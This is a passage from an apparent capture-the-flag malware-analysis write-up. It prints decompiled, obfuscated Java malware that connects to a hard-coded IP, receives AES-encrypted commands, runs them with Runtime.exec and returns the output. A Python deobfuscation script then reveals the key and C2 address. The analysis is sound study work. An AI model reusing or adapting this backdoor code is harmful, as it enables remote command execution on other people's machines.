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";
         String var1 = "/tmp/Comms.class";
         decryptToFile(var0, var1);
      } catch (Exception var2) {
         var2.printStackTrace();
      }

   }
}

This code is designed to decrypt the var0 Base64 data, producing Comms.class as the output. It uses the AES encryption method in ECB mode, with the key derived from FLAGPART1 to FLAGPART16, which forms the key CJ{c4n_y0u_c0nti. By using tools like CyberChef, we can decode and decrypt var0 to retrieve Comms.class.

Using Decompiler again, we can get the Comms.java.

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.lang.reflect.Method;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Arrays;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class Comms {
   // $FF: synthetic field
   private static final String[] I;
   // $FF: synthetic field
   private static final String XXX;
   // $FF: synthetic field
   private static final String YYY;
   // $FF: synthetic field
   private static final int[] l;

   private static void IIl() {
      l = new int[32];
      l[0] = (21 + 181 - 65 + 113 ^ 46 + 154 - 161 + 126) & (151 ^ 185 ^ 77 ^ 60 ^ -" ".length());
      l[1] = "  ".length();
      l[2] = " ".length();
      l[3] = "   ".length();
      l[4] = 85 ^ 49 ^ 163 ^ 195;
      l[5] = 127 ^ 122;
      l[6] = 104 ^ 110;
      l[7] = 87 + 12 - -35 + 36 ^ 83 + 116 - 132 + 106;
      l[8] = 24 ^ 16;
      l[9] = 182 + 39 - 48 + 11 ^ 50 + 91 - 39 + 75;
      l[10] = 19 ^ 65 ^ 1 ^ 89;
      l[11] = 92 ^ 87;
      l[12] = 50 ^ 62;
      l[13] = 71 ^ 74;
      l[14] = 27 ^ 21;
      l[15] = 146 ^ 157;
      l[16] = 161 ^ 174 ^ 144 ^ 143;
      l[17] = 141 ^ 156;
      l[18] = 73 ^ 91;
      l[19] = 95 ^ 99 ^ 187 ^ 148;
      l[20] = 124 ^ 104;
      l[21] = 203 ^ 192 ^ 189 ^ 163;
      l[22] = 1 ^ 104 ^ 108 + 36 - 21 + 4;
      l[23] = 47 ^ 24 ^ 137 ^ 169;
      l[24] = 120 ^ 117 ^ 13 ^ 24;
      l[25] = 59 + 50 - 57 + 83 ^ 3 + 96 - -11 + 48;
      l[26] = 142 + 117 - 184 + 113 ^ 153 + 63 - 187 + 137;
      l[27] = -8257 & 9593;
      l[28] = 26 ^ 1;
      l[29] = 105 ^ 96 ^ 39 ^ 50;
      l[30] = 41 ^ 52;
      l[31] = 135 + 73 - 150 + 88 ^ 21 + 88 - 1 + 32;
   }

   private static void ll() {
      I = new String[l[31]];
      I[l[0]] = I("eBq0gvhn60zfo1MunQjxEq+VgKjg5XsIv3e9pz85TDc=", "nErxg");
      I[l[2]] = l("XnpOLQlfekJ7XFwhTC8NXQ==", "nCzKk");
      I[l[1]] = I("7Ep1Z+Gia+U=", "UWraX");
      I[l[3]] = l("GxQcABJfFhgYGgUaRCIDAR0PEw==", "qujaj");
      I[l[4]] = l("AjwsJhwWLTkBEQA=", "eYXor");
      I[l[5]] = l("Ewc5RxARAEU4HhERXzg0NiYDBjI=", "RBjhU");
      I[l[6]] = l("Lx8HDA==", "FqnxZ");
      I[l[7]] = I("GHxTbaCWgquBBBSGerx+TiFBtURhB40u", "KcZiK");
      I[l[8]] = Il("Cf4KGA89+bA=", "uMCDA");
      I[l[9]] = Il("o1OzBtlndQ+3+IyNY+3z+HrXBauLHpzj", "OaiGN");
      I[l[10]] = Il("R5lwGFYcS7eccTUFCOhdLg==", "KunRL");
      I[l[11]] = l("ERwyKBERJj4UAQYbPyA=", "trQGu");
      I[l[12]] = Il("2/vFTel4NG6ys7fiFcHEt0wZOsC1vJqXP5GHiA7T9jE=", "dhvCA");
      I[l[13]] = l("fV1yEhJ8XX5ER38GcBAWfg==", "MdFtp");
      I[l[14]] = l("AwoL", "BOXvi");
      I[l[15]] = Il("kqsvxVHphdfXglIktDCFoHPv2dha64mD", "YbUwj");
      I[l[16]] = l("Lg8VPC86HgAbIiw=", "IjauA");
      I[l[17]] = Il("vLru125xRYdTLHj1VD9qtUsvKbrijfbX", "RqduM");
      I[l[18]] = Il("xRwDzYljVIU=", "fScWC");
      I[l[19]] = l("EAkMJl8JDRkyAxMcA2k6HxE=", "zhzGq");
      I[l[20]] = l("LyQVKDwqJw==", "KKSAR");
      I[l[21]] = l("CwkvD2gUHDACaCMJKgtwVQ==", "ahYnF");
      I[l[22]] = Il("uIHhwTaeAscF3EzVgdL4zg==", "tMxGZ");
      I[l[23]] = l("ChYmChAL", "nsEet");
      I[l[24]] = l("al9YAjJrX1RUZ2gEWgA2aQ==", "ZfldP");
      I[l[25]] = l("JygSTjMlL24xPSU+dDEXAgkoDxE=", "fmAav");
      I[l[26]] = I("EvA8rhxJMXPTCc0Wno5a9Q==", "QvZtB");
      I[l[28]] = l("OTAxITtw", "zxtbp");
      I[l[29]] = Il("gT9cJw1pjVI=", "eTlqI");
      I[l[30]] = I("BAW3Glpb798=", "pExyG");
   }

   private static boolean lll(int var0, int var1) {
      return var0 < var1;
   }

   static {
      IIl();
      ll();
      XXX = I[l[24]];
      YYY = I[l[25]];

      try {
         Socket llIlllIllllllll = new Socket(I[l[26]], l[27]);

         try {
            BufferedReader IlIlllIllllllll = new BufferedReader(new InputStreamReader(llIlllIllllllll.getInputStream()));

            try {
               BufferedWriter lIIlllIllllllll = new BufferedWriter(new OutputStreamWriter(llIlllIllllllll.getOutputStream()));

               try {
                  do {
                     lIIlllIllllllll.write(I[l[28]]);
                     lIIlllIllllllll.flush();
                     boolean IIIlllIllllllll = IlIlllIllllllll.readLine();
                     if (lIl(IIIlllIllllllll) && Ill(IIIlllIllllllll.isEmpty())) {
                        Exception lllIllIllllllll = decrypt(IIIlllIllllllll);
                        double IllIllIllllllll = Runtime.getRuntime().exec(lllIllIllllllll);
                        int lIlIllIllllllll = new BufferedReader(new InputStreamReader(IllIllIllllllll.getInputStream()));
                        StringBuilder IIlIllIllllllll = new StringBuilder();

                        String llIIllIllllllll;
                        while(lIl(llIIllIllllllll = lIlIllIllllllll.readLine())) {
                           IIlIllIllllllll.append(llIIllIllllllll).append(I[l[29]]);
                           "".length();
                           "".length();
                           if (-"   ".length() >= 0) {
                              return;
                           }
                        }

                        boolean IlIIllIllllllll = encrypt(String.valueOf(IIlIllIllllllll));
                        lIIlllIllllllll.write(String.valueOf((new StringBuilder()).append(IlIIllIllllllll).append(I[l[30]])));
                        lIIlllIllllllll.flush();
                     }

                     Thread.sleep(5000L);
                     "".length();
                  } while((107 ^ 111) >= "   ".length());

               } catch (Throwable var13) {
                  label61: {
                     try {
                        lIIlllIllllllll.close();
                     } catch (Throwable var12) {
                        var13.addSuppressed(var12);
                        break label61;
                     }

                     "".length();
                     if ("  ".length() < 0) {
                        return;
                     }
                  }

                  throw var13;
               }
            } catch (Throwable var14) {
               label56: {
                  try {
                     IlIlllIllllllll.close();
                  } catch (Throwable var11) {
                     var14.addSuppressed(var11);
                     break label56;
                  }

                  "".length();
                  if (((4 + 93 - 74 + 114 ^ 54 + 50 - -65 + 28) & (101 ^ 120 ^ 60 ^ 109 ^ -" ".length())) < 0) {
                     return;
                  }
               }

               throw var14;
            }
         } catch (Throwable var15) {
            label51: {
               try {
                  llIlllIllllllll.close();
               } catch (Throwable var10) {
                  var15.addSuppressed(var10);
                  break label51;
               }

               "".length();
               if ("  ".length() != "  ".length()) {
                  return;
               }
            }

            throw var15;
         }
      } catch (Exception var16) {
         var16.printStackTrace();
      }
   }

   private static String encrypt(String llllIllllllllll) throws Exception {
      byte IlllIllllllllll = Class.forName(I[l[0]]);
      Class[] var10001 = new Class[l[1]];
      var10001[l[0]] = byte[].class;
      var10001[l[2]] = String.class;
      short lIllIllllllllll = IlllIllllllllll.getConstructor(var10001);
      Object[] var14 = new Object[l[1]];
      var14[l[0]] = I[l[2]].getBytes();
      var14[l[2]] = I[l[1]];
      long IIllIllllllllll = lIllIllllllllll.newInstance(var14);
      int llIlIllllllllll = Class.forName(I[l[3]]);
      String var15 = I[l[4]];
      Class[] var10002 = new Class[l[2]];
      var10002[l[0]] = String.class;
      double IlIlIllllllllll = llIlIllllllllll.getMethod(var15, var10002);
      Object[] var16 = new Object[l[2]];
      var16[l[0]] = I[l[5]];
      double lIIlIllllllllll = IlIlIllllllllll.invoke((Object)null, var16);
      var15 = I[l[6]];
      var10002 = new Class[l[1]];
      var10002[l[0]] = Integer.TYPE;
      var10002[l[2]] = Class.forName(I[l[7]]);
      byte IIIlIllllllllll = llIlIllllllllll.getMethod(var15, var10002);
      var16 = new Object[l[1]];
      var16[l[0]] = l[2];
      var16[l[2]] = IIllIllllllllll;
      IIIlIllllllllll.invoke(lIIlIllllllllll, var16);
      "".length();
      var15 = I[l[8]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = byte[].class;
      char lllIIllllllllll = llIlIllllllllll.getMethod(var15, var10002);
      var16 = new Object[l[2]];
      var16[l[0]] = llllIllllllllll.getBytes();
      int IllIIllllllllll = (byte[])lllIIllllllllll.invoke(lIIlIllllllllll, var16);
      Exception lIlIIllllllllll = Class.forName(I[l[9]]);
      double IIlIIllllllllll = lIlIIllllllllll.getMethod(I[l[10]]);
      double llIIIllllllllll = IIlIIllllllllll.invoke((Object)null);
      Class var10000 = llIIIllllllllll.getClass();
      var15 = I[l[11]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = byte[].class;
      Method IlIIIllllllllll = var10000.getMethod(var15, var10002);
      var16 = new Object[l[2]];
      var16[l[0]] = IllIIllllllllll;
      return (String)IlIIIllllllllll.invoke(llIIIllllllllll, var16);
   }

   private static String I(String IIIlIlIllllllll, String lllIIlIllllllll) {
      try {
         SecretKeySpec lIllIlIllllllll = new SecretKeySpec(MessageDigest.getInstance("MD5").digest(lllIIlIllllllll.getBytes(StandardCharsets.UTF_8)), "Blowfish");
         Cipher IIllIlIllllllll = Cipher.getInstance("Blowfish");
         IIllIlIllllllll.init(l[1], lIllIlIllllllll);
         return new String(IIllIlIllllllll.doFinal(Base64.getDecoder().decode(IIIlIlIllllllll.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
      } catch (Exception var4) {
         var4.printStackTrace();
         return null;
      }
   }

   private static String Il(String llIllIIllllllll, String IIlllIIllllllll) {
      try {
         byte lIIllIIllllllll = new SecretKeySpec(Arrays.copyOf(MessageDigest.getInstance("MD5").digest(IIlllIIllllllll.getBytes(StandardCharsets.UTF_8)), l[8]), "DES");
         Exception IIIllIIllllllll = Cipher.getInstance("DES");
         IIIllIIllllllll.init(l[1], lIIllIIllllllll);
         return new String(IIIllIIllllllll.doFinal(Base64.getDecoder().decode(llIllIIllllllll.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
      } catch (Exception var4) {
         var4.printStackTrace();
         return null;
      }
   }

   private static String l(String lIllIIIllllllll, String lllIIIIllllllll) {
      lIllIIIllllllll = new String(Base64.getDecoder().decode(lIllIIIllllllll.getBytes(StandardCharsets.UTF_8)), StandardCharsets.UTF_8);
      byte IllIIIIllllllll = new StringBuilder();
      short lIlIIIIllllllll = lllIIIIllllllll.toCharArray();
      int lIIlIIIllllllll = l[0];
      boolean llIIIIIllllllll = lIllIIIllllllll.toCharArray();
      boolean IlIIIIIllllllll = llIIIIIllllllll.length;
      int lIIIIIIllllllll = l[0];

      do {
         if (!lll(lIIIIIIllllllll, IlIIIIIllllllll)) {
            return String.valueOf(IllIIIIllllllll);
         }

         char IlllIIIllllllll = llIIIIIllllllll[lIIIIIIllllllll];
         IllIIIIllllllll.append((char)(IlllIIIllllllll ^ lIlIIIIllllllll[lIIlIIIllllllll % lIlIIIIllllllll.length]));
         "".length();
         ++lIIlIIIllllllll;
         ++lIIIIIIllllllll;
         "".length();
      } while((188 ^ 184) >= "  ".length());

      return null;
   }

   private static boolean Ill(int var0) {
      return var0 == 0;
   }

   private static String decrypt(String llIIlIlllllllll) throws Exception {
      double IlIIlIlllllllll = Class.forName(I[l[12]]);
      Class[] var10001 = new Class[l[1]];
      var10001[l[0]] = byte[].class;
      var10001[l[2]] = String.class;
      String lIIIlIlllllllll = IlIIlIlllllllll.getConstructor(var10001);
      Object[] var15 = new Object[l[1]];
      var15[l[0]] = I[l[13]].getBytes();
      var15[l[2]] = I[l[14]];
      String IIIIlIlllllllll = lIIIlIlllllllll.newInstance(var15);
      long llllIIlllllllll = Class.forName(I[l[15]]);
      String var16 = I[l[16]];
      Class[] var10002 = new Class[l[2]];
      var10002[l[0]] = String.class;
      double IlllIIlllllllll = llllIIlllllllll.getMethod(var16, var10002);
      Object[] var17 = new Object[l[2]];
      var17[l[0]] = I[l[17]];
      byte lIllIIlllllllll = IlllIIlllllllll.invoke((Object)null, var17);
      var16 = I[l[18]];
      var10002 = new Class[l[1]];
      var10002[l[0]] = Integer.TYPE;
      var10002[l[2]] = Class.forName(I[l[19]]);
      short IIllIIlllllllll = llllIIlllllllll.getMethod(var16, var10002);
      var17 = new Object[l[1]];
      var17[l[0]] = l[1];
      var17[l[2]] = IIIIlIlllllllll;
      IIllIIlllllllll.invoke(lIllIIlllllllll, var17);
      "".length();
      var16 = I[l[20]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = byte[].class;
      byte llIlIIlllllllll = llllIIlllllllll.getMethod(var16, var10002);
      float IlIlIIlllllllll = Class.forName(I[l[21]]);
      byte lIIlIIlllllllll = IlIlIIlllllllll.getMethod(I[l[22]]);
      String IIIlIIlllllllll = lIIlIIlllllllll.invoke((Object)null);
      Class var10000 = IIIlIIlllllllll.getClass();
      var16 = I[l[23]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = String.class;
      double lllIIIlllllllll = var10000.getMethod(var16, var10002);
      var17 = new Object[l[2]];
      var17[l[0]] = llIIlIlllllllll;
      byte[] IllIIIlllllllll = (byte[])lllIIIlllllllll.invoke(IIIlIIlllllllll, var17);
      Object[] var10004 = new Object[l[2]];
      var10004[l[0]] = IllIIIlllllllll;
      return new String((byte[])llIlIIlllllllll.invoke(lIllIIlllllllll, var10004));
   }

   private static boolean lIl(Object var0) {
      return var0 != null;
   }
}

Essentially, the decryption process employs various methods, including Blowfish, DES, and XOR, determined by specific variables (I, Il(IL), l(L)). To streamline the solution, I opted to develop a Python script tailored to automate and resolve this intricate decryption task efficiently.

import base64
import hashlib
from Crypto.Cipher import Blowfish, DES

def blowfish_decrypt_b64(b64_ciphertext, key_str):
    # I
    key = hashlib.md5(key_str.encode('utf-8')).digest()
    cipher = Blowfish.new(key, Blowfish.MODE_ECB)
    raw = base64.b64decode(b64_ciphertext)
    dec = cipher.decrypt(raw)
    # Some strings might have null padding at the end
    return dec.rstrip(b'\x00')

def des_decrypt_b64(b64_ciphertext, key_str):
    # Il
    full_md5 = hashlib.md5(key_str.encode('utf-8')).digest()
    des_key = full_md5[:8]  # first 8 bytes
    cipher = DES.new(des_key, DES.MODE_ECB)
    raw = base64.b64decode(b64_ciphertext)
    dec = cipher.decrypt(raw)
    return dec.rstrip(b'\x00')

def xor_b64(b64_ciphertext, key_str):
    # l
    raw = base64.b64decode(b64_ciphertext)
    out = bytearray(len(raw))
    key = key_str.encode('utf-8')
    for i in range(len(raw)):
        out[i] = raw[i] ^ key[i % len(key)]
    return out

def decode_item(decode_type, ciphertext, key):
    if decode_type == 'I':   # Blowfish
        return blowfish_decrypt_b64(ciphertext, key)
    elif decode_type == 'Il':  # DES
        return des_decrypt_b64(ciphertext, key)
    elif decode_type == 'l':   # XOR
        return xor_b64(ciphertext, key)
    else:
        return b''

entries = [
    ('I',  "eBq0gvhn60zfo1MunQjxEq+VgKjg5XsIv3e9pz85TDc=", "nErxg",  "I[l[0]]"),
    ('l',  "XnpOLQlfekJ7XFwhTC8NXQ==",                  "nCzKk",  "I[l[2]]"),
    ('I',  "7Ep1Z+Gia+U=",                             "UWraX",  "I[l[1]]"),
    ('l',  "GxQcABJfFhgYGgUaRCIDAR0PEw==",              "qujaj",  "I[l[3]]"),
    ('l',  "AjwsJhwWLTkBEQA=",                          "eYXor",  "I[l[4]]"),
    ('l',  "Ewc5RxARAEU4HhERXzg0NiYDBjI=",               "RBjhU",  "I[l[5]]"),
    ('l',  "Lx8HDA==",                                  "FqnxZ",  "I[l[6]]"),
    ('I',  "GHxTbaCWgquBBBSGerx+TiFBtURhB40u",           "KcZiK",  "I[l[7]]"),
    ('Il', "Cf4KGA89+bA=",                              "uMCDA",  "I[l[8]]"),
    ('Il', "o1OzBtlndQ+3+IyNY+3z+HrXBauLHpzj",           "OaiGN",  "I[l[9]]"),
    ('Il', "R5lwGFYcS7eccTUFCOhdLg==",                  "KunRL",  "I[l[10]]"),
    ('l',  "ERwyKBERJj4UAQYbPyA=",                      "trQGu",  "I[l[11]]"),
    ('Il', "2/vFTel4NG6ys7fiFcHEt0wZOsC1vJqXP5GHiA7T9jE=", "dhvCA", "I[l[12]]"),
    ('l',  "fV1yEhJ8XX5ER38GcBAWfg==",                  "MdFtp",  "I[l[13]]"),
    ('l',  "AwoL",                                      "BOXvi",  "I[l[14]]"),
    ('Il', "kqsvxVHphdfXglIktDCFoHPv2dha64mD",           "YbUwj",  "I[l[15]]"),
    ('l',  "Lg8VPC86HgAbIiw=",                          "IjauA",  "I[l[16]]"),
    ('Il', "vLru125xRYdTLHj1VD9qtUsvKbrijfbX",           "RqduM",  "I[l[17]]"),
    ('Il', "xRwDzYljVIU=",                              "fScWC",  "I[l[18]]"),
    ('l',  "EAkMJl8JDRkyAxMcA2k6HxE=",                   "zhzGq",  "I[l[19]]"),
    ('l',  "LyQVKDwqJw==",                              "KKSAR",  "I[l[20]]"),
    ('l',  "CwkvD2gUHDACaCMJKgtwVQ==",                   "ahYnF",  "I[l[21]]"),
    ('Il', "uIHhwTaeAscF3EzVgdL4zg==",                  "tMxGZ",  "I[l[22]]"),
    ('l',  "ChYmChAL",                                  "nsEet",  "I[l[23]]"),
    ('l',  "al9YAjJrX1RUZ2gEWgA2aQ==",                   "ZfldP",  "I[l[24]]"),
    ('l',  "JygSTjMlL24xPSU+dDEXAgkoDxE=",               "fmAav",  "I[l[25]]"),
    ('I',  "EvA8rhxJMXPTCc0Wno5a9Q==",                   "QvZtB",  "I[l[26]]"),
    # l[27] is an int (socket port?), not a string
    ('l',  "OTAxITtw",                                  "zxtbp",  "I[l[28]]"),
    ('Il', "gT9cJw1pjVI=",                              "eTlqI",  "I[l[29]]"),
    ('I',  "BAW3Glpb798=",                              "pExyG",  "I[l[30]]"),
]

def main():
    for decode_type, b64str, key_str, label in entries:
        out = decode_item(decode_type, b64str, key_str)
        try:
            out_str = out.decode('utf-8')
        except:
            out_str = repr(out)
        print(f"{label} => {out_str}")

if __name__ == '__main__':
    main()

This process ultimately produces the following output:

 $ python solver.py 
I[l[0]] => javax.crypto.spec.SecretKeySpec
I[l[2]] => 094fb198072b6df3
I[l[1]] => AES
I[l[3]] => javax.crypto.Cipher
I[l[4]] => getInstance
I[l[5]] => AES/ECB/PKCS5Padding
I[l[6]] => init
I[l[7]] => java.security.Key
I[l[8]] => doFinal
I[l[9]] => java.util.Base64
I[l[10]] => getEncoder
I[l[11]] => encodeToString
I[l[12]] => javax.crypto.spec.SecretKeySpec
I[l[13]] => 094fb198072b6df3
I[l[14]] => AES
I[l[15]] => javax.crypto.Cipher
I[l[16]] => getInstance
I[l[17]] => AES/ECB/PKCS5Padding
I[l[18]] => init
I[l[19]] => java.security.Key
I[l[20]] => doFinal
I[l[21]] => java.util.Base64
I[l[22]] => getDecoder
I[l[23]] => decode
I[l[24]] => 094fb198072b6df3
I[l[25]] => AES/ECB/PKCS5Padding
I[l[26]] => 198.211.115.148
I[l[28]] => CHECK

I[l[29]] => 

I[l[30]] =>

The setup described involves encrypting and decrypting data using AES in ECB mode, combined with Base64 decoding, with the key set to 094fb198072b6df3. Returning to our PCAP file for further analysis, we discovered a suspicious packet containing the keyword “CHECK” and Base64-encoded data in packet 3255.

Using Python once again, I decoded the Base64 data and decrypted it using the provided key, 094fb198072b6df3.

from base64 import b64decode
from Crypto.Cipher import AES

# AES key
key = b"094fb198072b6df3"  # Ensure the key is exactly 16 bytes for AES-128

# List of Base64-encoded strings
encoded_strings = [
    "x3rMMuy2zwVIbc22P3Am0A==",
